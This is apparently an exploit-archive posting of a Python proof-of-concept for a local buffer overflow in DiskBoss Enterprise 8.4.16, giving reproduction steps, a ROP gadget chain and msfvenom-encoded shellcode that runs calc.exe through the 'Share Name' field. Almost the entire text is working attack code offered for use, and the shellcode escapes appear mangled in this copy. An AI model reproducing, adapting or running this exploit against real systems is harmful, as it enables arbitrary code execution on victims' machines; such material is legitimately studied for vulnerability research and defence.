DiskBoss Enterprise 8.4.16 Local Buffer Overflow
Posted on 05 October 2017
#!/usr/bin/python #======================================================================================================================== # Exploit Author: C4t0ps1s # Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution) # Date: 03-10-2017 # Twitter: @C4t0ps1s # Email: C4t0ps1s@gmail.com # Vulnerable Software: DiskBoss Enterprise v8.4.16 # Vendor Homepage: http://www.diskboss.com # Version: v8.4.16 # Software Link: http://www.diskboss.com/downloads.html # Tested On: Windows 10 x64 # # Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/ # # To reproduce the code execution: # 1. Click Server # 2. Click Connect # 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect # #======================================================================================================================== import struct buff = "a"*1312 #push esp | pop esi | retn 4 buff += struct.pack("<L",0x65247445) #mov eax, esi | pop esi | retn 4 buff += struct.pack("<L",0x65273f24) buff += "PADD" buff += "PADD" #pop ebx | retn buff += struct.pack("<L",0x65222936) buff += "PADD" buff += struct.pack("<L",0x7f7f7f7f) #add eax, ebx | pop esi | pop ebx | retn 0xc buff += struct.pack("<L",0x65222d7d) buff += "PADD" buff += struct.pack("<L",0x7f7f7f7f) #add eax, ebx | pop esi | pop ebx | retn 0xc buff += struct.pack("<L",0x65222d7d) buff += "PADD" buff += "PADD" buff += "PADD" buff += "PADD" buff += struct.pack("<L",0x0101015a) #add eax, ebx | pop esi | pop ebx | retn 0xc buff += struct.pack("<L",0x65222d7d) buff += "PADD" buff += "PADD" buff += "PADD" buff += "PADD" buff += "PADD" #jmp eax buff += struct.pack("<L",0x65217d28) #inc eax buff += "x40"*20 #msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw sc = "x50x59x49x49x49x49x49x49x49x49x49x49x49x49x49x49" sc += "x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6bx41x41" sc += "x51x32x41x42x32x42x42x30x42x42x41x42x58x50x38x41" sc += "x42x75x4ax49x39x6cx68x68x6ex62x45x50x75x50x37x70" sc += "x31x70x6fx79x78x65x66x51x6bx70x50x64x4ex6bx52x70" sc += "x56x50x6cx4bx51x42x44x4cx6ex6bx43x62x55x44x6ex6b" sc += "x64x32x57x58x76x6fx68x37x42x6ax47x56x44x71x49x6f" sc += "x6cx6cx75x6cx75x31x73x4cx73x32x76x4cx31x30x6ax61" sc += "x4ax6fx74x4dx66x61x5ax67x38x62x4bx42x52x72x70x57" sc += "x4ex6bx52x72x66x70x6cx4bx33x7ax35x6cx6cx4bx42x6c" sc += "x77x61x52x58x6ax43x37x38x55x51x6bx61x33x61x4ex6b" sc += "x73x69x65x70x47x71x7ax73x6ex6bx67x39x36x78x4bx53" sc += "x75x6ax72x69x6ex6bx45x64x4ex6bx43x31x58x56x56x51" sc += "x79x6fx6ex4cx6bx71x6ax6fx34x4dx43x31x39x57x65x68" sc += "x39x70x71x65x7ax56x73x33x51x6dx5ax58x45x6bx51x6d" sc += "x44x64x74x35x4dx34x30x58x4ex6bx31x48x74x64x75x51" sc += "x4ax73x65x36x4cx4bx54x4cx32x6bx4ex6bx36x38x57x6c" sc += "x53x31x48x53x4cx4bx75x54x4cx4bx77x71x7ax70x4fx79" sc += "x77x34x61x34x64x64x61x4bx43x6bx61x71x43x69x71x4a" sc += "x62x71x59x6fx6bx50x61x4fx33x6fx33x6ax6cx4bx46x72" sc += "x78x6bx4cx4dx43x6dx73x5ax37x71x6cx4dx6ex65x58x32" sc += "x47x70x55x50x47x70x32x70x45x38x56x51x4cx4bx42x4f" sc += "x6fx77x69x6fx4bx65x4fx4bx78x70x6ex55x69x32x53x66" sc += "x65x38x4fx56x6cx55x4fx4dx6dx4dx6bx4fx4ax75x45x6c" sc += "x66x66x53x4cx75x5ax6fx70x69x6bx69x70x42x55x53x35" sc += "x6dx6bx51x57x65x43x31x62x42x4fx71x7ax45x50x72x73" sc += "x4bx4fx78x55x35x33x35x31x32x4cx55x33x46x4ex75x35" sc += "x43x48x50x65x55x50x41x41" buff += sc f = open("shareName.txt","wb") f.write(buff) f.close()
